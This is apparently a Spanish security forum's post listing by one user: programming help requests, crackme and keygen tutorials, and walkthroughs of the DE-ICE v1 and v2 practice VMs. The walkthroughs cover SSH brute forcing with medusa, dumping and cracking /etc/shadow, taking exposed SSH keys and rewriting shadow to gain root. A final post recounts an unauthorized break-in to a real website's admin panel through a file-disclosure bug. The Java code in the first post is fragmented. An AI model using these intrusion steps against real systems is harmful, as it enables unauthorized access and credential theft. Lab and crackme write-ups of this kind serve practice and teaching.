|
Mostrar Temas
|
Páginas: [1] 2
|
1
|
Programación / Java / [Ayuda] Problemas con un juego en java
|
en: 18 Abril 2015, 19:55 pm
|
Buenas Estoy comenzando con la programación de juegos en Java (Hasta llegar a Android), pero se me está resistiendo El problema es que no me muestra el personaje, la Base me da un html, ya importé la imagen... Pero no hay forma de que aparezca el dichoso "dibujo" He aquí el código: Clase1: package juego01; import java.applet.Applet; import java.awt.Color; import java.awt.Frame; import java.awt.Graphics; import java.awt.Image; import java.awt.event.KeyEvent; import java.awt.event.KeyListener; import java.net.URL; private robot Maquina; private Image image,jugador ; private URL base ; //Igual debes ponerle valor... por ahora vale null //Espera que reviso una cosa rapido¬_ @Override public void init() { setSize(800, 480); setBackground (Color. green); setFocusable(true); addKeyListener(this); Frame frame = (Frame) this. getParent(). getParent(); frame.setTitle("Q-Bot Alpha"); jugador = getImage(base,"Nave.png"); base=getDocumentBase(); } @Override public void start() { Maquina = new robot(); thread.start(); } @Override public void stop() { // TODO Auto-generated method stub } @Override public void destroy() { // TODO Auto-generated method stub } @Override public void run() { while (true) { Maquina.update(); repaint(); try { e.printStackTrace(); } } } if(image==null){ image = createImage(this.getWidth(),this.getHeight()); second = image.getGraphics(); } second.setColor(getBackground()); second.fillRect(0, 0,getWidth(), getHeight()); second.setColor(getForeground()); g.drawImage(image,50,50,this); paint(second); } g.drawImage(jugador,Maquina.getPosX(),300,this); } @Override switch (e.getKeyCode()) { System. out. println("Move up"); break; System. out. println("Move down"); break; Maquina.moveLeft(); break; Maquina.moveRight(); break; break; } } switch (e.getKeyCode()) { System. out. println("Stop moving up"); break; System. out. println("Stop moving down"); break; System. out. println("Stop moving left"); break; System. out. println("Stop moving right"); break; System. out. println("Stop jumping"); break; } } @Override // TODO } }
Clase 2: package juego01; public class robot { private int maxX = 640; private int posX = 0; public void update(){ if(posX >=maxX){ posX = maxX; } if(posX <=0){ posX = 0; } } public void moveRight(){ posX += 6; } public void moveLeft(){ posX -= 6; } public int getPosX(){ return posX; } public void setPosX(int posX){ this.posX=posX; } }
Un saludo, y gracias
|
|
|
2
|
Programación / Programación General / [Ayuda] Problema con python y Android SDK
|
en: 3 Abril 2015, 16:37 pm
|
Al intentar ejecutar la instalación del SDK en windows vía consola de Android SDK (Para crear unas cosas para android) obtengo el siguiente error: c:\pgs4a-0.9.4>python android.py installsdk I'm compiling a short test program, to see if you have a working JDK on your system. Traceback (most recent call last): File "buildlib\install_sdk.py", line 17, in run subprocess.check_call(args) File "C:\Python27\lib\subprocess.py", line 535, in check_call retcode = call(*popenargs, **kwargs) File "C:\Python27\lib\subprocess.py", line 522, in call return Popen(*popenargs, **kwargs).wait() File "C:\Python27\lib\subprocess.py", line 710, in __init__ errread, errwrite) File "C:\Python27\lib\subprocess.py", line 958, in _execute_child startupinfo) WindowsError: [Error 2] El sistema no puede encontrar el archivo especificado I was unable to use javac to compile a test file. If you haven't installed the JDK yet, please download it from: http://www.oracle.com/technetwork/java/javase/downloads/index.htmlThe JDK is different from the JRE, so it's possible you have Java without having the JDK. Without a working JDK, I can't continue.Tengo java instalado (JDK y JRE), agregados al path del sistema, no comprendo ese error He probado reinstalado, y con otras versiones de JDK y nada Un saludo
|
|
|
4
|
Programación / Ingeniería Inversa / [Nivel 1/10] CrackMe básico C #4
|
en: 27 Diciembre 2012, 20:01 pm
|
Después de un tiempo sin programar alguno, volví con la cuarta versión de la serie de CrackMe's en C. General:- Plataforma: WIN32 (Testado en Win7 x64 y XP x86)
- Nivel: 1/10 (Ideado para principiantes)
- Lenguajes: C
- Tiempo de programación: 35 minutos
- Protecciones: Ninguna
- Código fuente: Mensaje privado
Reglas:- Reproducir algoritmo en Keygen
- Solución válida: Keygen y Tutorial
- No parchear
- No selfkeygenning
- No serialfishing
DescargarHappy CoddingOverSec.cu.cc Medio saludo.
|
|
|
6
|
Programación / Ingeniería Inversa / [Tutorial] Creando Keygen CrackMe Shooter
|
en: 1 Septiembre 2012, 19:45 pm
|
Un CrackMe que vi por ahí, en CrackMes.de. Método: Keygen Dificultad: 1/10 Protección: Lenguaje de alto nivel, Nombre de ejecutable, IsDebuggerPressent Plataforma: Win32 Descarga: Adjunto crackme y keygen Cracker: Yo-Mismo Dedicación: Newbies Dedicación: Shadowbyte, Jep, Swash, OverSec, CPH, .... Para qué repetirnos DescargarSaludos!
|
|
|
7
|
Seguridad Informática / Bugs y Exploits / [Relato] Entorno controlado de seguridad DE-Ice v1
|
en: 2 Febrero 2012, 23:21 pm
|
Esta vez vengo con DE-Ice v1.0. Las distribuciónes de seguridad pueden ser descargadas desde Heorot.net. ¿Qué necesitaremos?-Dos máquinas virtuales -De-ICE v1 -Backtrack 5 -Diccionario de claves comunes inglesas ¿Cuáles serán nuestros objetivos?-Mapeo de red -Análisis de red -Fuerza bruta a servicio -Fuerza bruta a shadow -Root ¿Reglas?-No Exploit Allá que vamosEscaneamos las redes para localizar a nuestra presa. netdiscover
Currently scanning: 192.168.1.0/16 | Screen View: ARP Reply 1 Captured ARP Reply packets, from 1 hosts. Total size: 60 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor ----------------------------------------------------------------------------- 192.168.1.100 08:00:27:b1:50:12 01 060 CADMUS COMPUTER SYSTEMS Identificamos servicvios con NMAP: root@bt:/# nmap -sV 192.168.1.100 Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-02 22:07 CET Nmap scan report for 192.168.1.100 Host is up (0.0070s latency). Not shown: 992 filtered ports PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd (broken: could not bind listening IPv4 socket) 22/tcp open ssh OpenSSH 4.3 (protocol 1.99) 25/tcp open smtp Sendmail 8.13.7/8.13.7 80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2) 110/tcp open pop3 Openwall popa3d 143/tcp open imap UW imapd 2004.357 443/tcp closed https MAC Address: 08:00:27:B1:50:12 (Cadmus Computer Systems) Service Info: Host: slax.example.net; OS: Unix Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.29 seconds Dejando huellaVemos que tenemnos varios servicios, excepto uno: FTP. No nos permite conexiones IPv4. Entramos via HTTP, y nos fijamos que la página nos muestra unos correos. Alteremoslos. Esto fue lo que obtuve: addams aadams adaams damsaa adamsa banterb bbanter banterb anterbb bbanteerbb coffeec cooffec ccoffee coooffe cooofef coofefc cooffee Lanzamos medusa tratando de tener suerte. medusa -h 192.168.1.100 -U user -P user -M ssh
¡Bingo! Nos encuentra un usuario. Mismo usuario y clave. ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: adaams (3 of 17 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: damsaa (4 of 17 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: adamsa (5 of 17 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: banterb (6 of 17 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: bbanter (7 of 17 complete) ACCOUNT FOUND: [ssh] Host: 192.168.1.100 User: bbanter Password: bbanter [SUCCESS] ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: addams (1 of 17 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: aadams (2 of 17 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: adaams (3 of 17 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: damsaa (4 of 17 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: adamsa (5 of 17 complete)
DecepciónAccedo vía SSH: Pero si tratamos de hacer un cat /etc/shadow, como es lógico, nos dirá que nuestro siguiente comando es: exit Si antes leemos el /etc/passwd, veremos que el usuario aadams se las trae con otros permisos. Pidiendo auxilio a la medusaIntentemos con otro diccionario: medusa -h 192.168.1.100 -U user -P list.lst -M ssh
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: fuckyou (578 of 675 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: matthew (579 of 675 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: miller (560 of 675 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: ou82 (561 of 675 complete) ACCOUNT FOUND: [ssh] Host: 192.168.1.100 User: aadams Password: nostradamus [SUCCESS] ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: tiger (562 of 675 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: trustno1 (563 of 675 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: 12345678 (564 of 675 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: alex (565 of 675 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: windows (566 of 675 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: flipper (567 of 675 complete) Nos muestra el usuario aadams, con su consiguiente clave. Entramos via SSH, y obtenemos el fichero. Root Successroot@bt:/pentest/passwords/john# ssh aadams@192.168.1.100aadams@192.168.1.100's password: Linux 2.6.16. aadams@slax:~$ sudo cat /etc/shadow Password: root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::bin:*:9797:0::::: daemon:*:9797:0::::: adm:*:9797:0::::: lp:*:9797:0::::: sync:*:9797:0::::: shutdown:*:9797:0::::: halt:*:9797:0::::: mail:*:9797:0::::: news:*:9797:0::::: uucp:*:9797:0::::: operator:*:9797:0::::: games:*:9797:0::::: ftp:*:9797:0::::: smmsp:*:9797:0::::: mysql:*:9797:0::::: rpc:*:9797:0::::: sshd:*:9797:0::::: gdm:*:9797:0::::: pop:*:9797:0::::: nobody:*:9797:0::::: aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7::: bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7::: ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::aadams@slax:~$ Salimos. exit
Crackeamos. root@bt:/pentest/passwords/john# ./john --rules --wordlist=list.lst shadow
El resultado se lo dejo a su imaginación, para no estropear el reto, regalando la clave. Resultado final: Hasta la próxima. Dedicación: Oversec, CPH, H-Sec, EH Saludos
|
|
|
8
|
Seguridad Informática / Bugs y Exploits / [Relato] Entorno controlado de seguridad DE-Ice v2
|
en: 2 Febrero 2012, 20:49 pm
|
Trasteando aburrido, descargué dos sistemas de seguridad controlados para practicar un Test de Intrusión. Estas son DE-ICE v1 y V2 respectivamente. Las distribuciónes de seguridad pueden ser descargadas desde Heorot.net. ¿Qué necesitaremos?-Dos máquinas virtuales -De-ICE v2 -Backtrack 5 ¿Cuáles serán nuestros objetivos?-Webcrawling -acceder servidor -Obtener privilegios de ROOT ¿Reglas?-No Exploit Empieza la fiesta.Lo primero que haremos será unir las dos máquinas virtuales. A de-ice se le asigna por defecto la subred 192.168.2.*. Esto se puede realizar con el siguiente comando: ifconfig eth0 192.168.2.150 Siendo 150 una dirección libre, y eth0 su interfaz de red. Procedamos pues a localizar el servidor. haremos uso de Netdiscover, o en su defecto, NMAP -sP 192.168.2.*. Veamos que tenemos por aquí. Currently scanning: 192.168.19.0/16 | Screen View: Unique Hosts
2 Captured ARP Req/Rep packets, fro.m 2 hosts. Total size: 120 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor ----------------------------------------------------------------------------- 192.168.2.100 08:00:27:b1:50:12 01 060 CADMUS COMPUTER SYSTEMS 192.168.2.101 08:00:27:b1:50:12 01 060 CADMUS COMPUTER SYSTEMS
Tenemos dos sistemas. Escaneamos con NMAP para obtener resultados. nmap -sV 192.168.2.100 - nmap -sV 192.168.2.101 -Primer host: PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 2.0.4 22/tcp open ssh OpenSSH 4.3 (protocol 1.99) 25/tcp open smtp Sendmail 8.13.7/8.13.7 80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2) 110/tcp open pop3 Openwall popa3d 143/tcp open imap UW imapd 2004.357 443/tcp closed https
FTP vulnerable... Pero no utilizaremos exploits, ni para atacar, ni para escalar privilegios. Vemos que el segundo únicamente tiene el puerto 80. Si accedemos a el via web, no vemos más que unos ficheros. Si accedemos a 192.168.2.100, vemos una página Web. Pincho el enlace y veo direcciones de correo. Está claro: Hay un servicio de correo, por lo que habrán dichos usuarios, "seguramente". Buscando amigosSeleccionamos la lista de correo, y la limpiamos de forma que simplemente quede el nombre del usuario, argegando el signo ~ (user) para tratar de brutalizar, haber si encontramos algún directorio de interés. Ésta es mi lista: root admin ~root ~admin ~pickwick ~winkle ~snodgrass ~tupman ~weller ~tweller ~havisham ~magwitch ~pirrip ~nickleby ~rnickleby ~noggs ~squeers ~pinch ~tapley ~gamp ~marley ~scrooge ~cratchit ~sikes ~dawkins ~claypole
Brutalizamos con DirBuster en 192.168.2.101 y vemos que hay un usuario, pirrip. Tratemos si con un poco de suerte existe la carpeta .ssh. http://192.168.2.101/~pirrip/.sshAhí tenemos los id_rsa y id_rsa.pub, esperándonos Lo almacenamos en /root/.ssh/ y damos permisos 777. Intruder HereProcedamos a conectar via SSH. Tachán! estamos dentro. You Have New MailEntramos y leemos el correo. Hagamos uso de mailx para leer el séptimo correo. En el vemos: root@bt:~# ssh pirrip@192.168.2.100Linux 2.6.16. pirrip@slax:~$ mailx mailx version nail 11.25 7/29/05. Type ? for help. "/var/mail/pirrip": 7 messages 7 new >N 1 Abel Magwitch Sun Jan 13 23:53 20/748 Estella N 2 Estella Havisham Sun Jan 13 23:53 20/780 welcome to the team N 3 Abel Magwitch Sun Jan 13 23:53 20/875 havisham N 4 Estella Havisham Mon Jan 14 00:05 20/861 next month N 5 Abel Magwitch Mon Jan 14 00:05 20/868 vacation N 6 Abel Magwitch Mon Jan 14 00:05 20/915 vacation N 7 noreply@fermion.he Mon Jan 14 00:05 29/983 Fermion Account Login Reminder ? 7 Leemos el correo: Tenemos una clave suculenta... Root Me, Please!Hagamos uso de una vieja técnica. Editamos el fichero /etc/shadows, eliminamos el usuario ROOT y sustituimos pirrip por ROOT. De esta forma nos damos privilegios. sudo vi /etc/shadow Ahí ingresaremos la clave que nos facilitó nuestro amigo via mail Antes: root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0::::: bin:*:9797:0::::: daemon:*:9797:0::::: adm:*:9797:0::::: lp:*:9797:0::::: sync:*:9797:0::::: shutdown:*:9797:0::::: halt:*:9797:0::::: mail:*:9797:0::::: news:*:9797:0::::: uucp:*:9797:0::::: operator:*:9797:0::::: games:*:9797:0::::: ftp:*:9797:0::::: smmsp:*:9797:0::::: mysql:*:9797:0::::: rpc:*:9797:0::::: sshd:*:9797:0::::: gdm:*:9797:0::::: pop:*:9797:0::::: nobody:*:9797:0::::: pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7::: magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7::: havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
Después: bin:*:9797:0::::: daemon:*:9797:0::::: adm:*:9797:0::::: lp:*:9797:0::::: sync:*:9797:0::::: shutdown:*:9797:0::::: halt:*:9797:0::::: mail:*:9797:0::::: news:*:9797:0::::: uucp:*:9797:0::::: operator:*:9797:0::::: games:*:9797:0::::: ftp:*:9797:0::::: smmsp:*:9797:0::::: mysql:*:9797:0::::: rpc:*:9797:0::::: sshd:*:9797:0::::: gdm:*:9797:0::::: pop:*:9797:0::::: nobody:*:9797:0::::: root:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7::: magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7::: havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
Guardamos, y tratamos de entrar como superadministrador. Recordemos la clave: 0l1v3rTw1st. pirrip@slax:~$ su Password: *********** root@slax:/home/pirrip# whoami root root@slax:/home/pirrip#
GAME OVER!Dedicación: 11Sep, [T]rasher, Batista, Exploit-Shell, en fin, a todo OverSec / CPH / H-Sec! Fuente: Oversec.org (Escrito por mi) Un saludo
|
|
|
9
|
Programación / Ingeniería Inversa / [Tutorial] SelfKeygen Crackme 58DD2D69 C.L.S.
|
en: 17 Diciembre 2011, 19:31 pm
|
Este es un crackme que descargué de la lista de cls, 12/2011. Descripción:This crackme is a simple algorithm.It's written in visual c++ 6.0 with mfc. Level 1/10 Herramientas:-OllyDBG Donde lo descargo- AquíPuesta a punto Arrancamos con Olly, y buscamos entre las strings: Vamos al salto al chico bueno y vemos lo siguiente: Vemos que tenemos 4 strings, una de longitud mínima, serial olvidado, el chico bueno y chico malo. Nos fijamos que antes pasa por una comparación. Colocamos un BP en dicho CALL, y vemos que se trae entre manos: Vemos que ahí tenemos el serial falso y verdadero comparándose. Afilando los dientes Básicamete lo que haremos, es decirle al programa que de no cumplirse, realice un JMP a una zona vacia del ejecutable, con permisos, donde obtendrá el serial verdadero y lo mostrará. Creamos un salto a una zona vacía En ella cargamos los valores, y posteriormente hacemos un salto al CALL. Vemos que funciona. Nos vemos! Guardamos los cambios a otro ejecutable, y probamos. Primero un serial falso y después el verdadero que mostró: Saludos EDITO: Próximamente keygen.
|
|
|
10
|
Seguridad Informática / Nivel Web / Relato de una infiltración, a medias. Full Source Disclousure.
|
en: 6 Diciembre 2011, 14:07 pm
|
Publicado en Oversec.org, autoría propia. Esto es un relato un tanto viejo, al cual dejé pasar un tiempo antes de publicar, por motivos obvios, hasta que el bug fue reparado. Mientras mi "socio", 11sep y yo buscábamos "juguetitos en línea", encontramos un servidor vulnerable. Esta vez, un FSD. Igual que el anterior relato, la llamaremos site.com. Esta página, tenía un script absurdo, que descargaba "ficheros", en la ruta site.com/down.php?f=xxx Recorrimos la página desde el index hasta topar con los datos de MySQL, al cual accedimos, bajo previa protección. Llegamos al panel de administración, pero el problema estaba en que se trataba de un hash en SHA1 y MD5, el cual en lugar de brutalizar, cambiamos la clave durante 1 minuto para entrar. Dentro nos topamos con un sinfín de vulnerabilidades, que si FSD, que si FPD, que si SQLi... Y un lindo uploader No hicimos nada, ya que la web podríamos clonarla, y teniamos la base de datos. Como en el anterior relato, es mi único objetivo. Dejamos pasar un tiempo, y volvimos a intentar entrar, para subir una shell. Resulta que habían migrado a un servidor MySQL que no permitía conexiones internas. Sinceramente me resulta patético buscar scripts por Mr.Google y colgarlos, sin antes saber qué hace... Imaginen si hubieramos subido la shell y rooteado... ¿De qué habría servido migrar el servidor? Pasamos por alto un sin fín de oportunidades, utilizar el FPD para subir una shell desde SQL, bypassear el uploader, incrustar un PHP en pleno index con la shell... Nuestro objetivo no fue más que lograr una infiltración al área restringida (Panel de administración) Como siempre digo, Antes de correr, hay que saber andar. Un saludo. Saludos
|
|
|
|
|
|
|